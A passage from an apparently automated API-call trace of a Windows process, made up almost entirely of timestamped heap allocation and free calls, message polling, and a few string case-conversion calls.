0x2aa9a60 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b96) returned 0x2a9cfb8 [0086.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b96) returned 0x2abe880 [0086.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b20 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9cfb8 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.760] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0086.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.760] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0086.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0086.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0086.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0086.761] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0086.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0086.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0086.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0086.814] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0086.814] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0086.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0086.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0086.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0086.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0086.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0086.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0086.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0086.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0086.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0086.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0086.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0086.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0086.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0086.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0086.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0086.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0086.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69970 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0086.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0086.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b96) returned 0x2abe880 [0086.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0086.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0086.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0086.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0086.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0086.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f78b8 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69b80 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b80 | out: hHeap=0x2af0000) returned 1 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0086.827] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0086.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0086.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 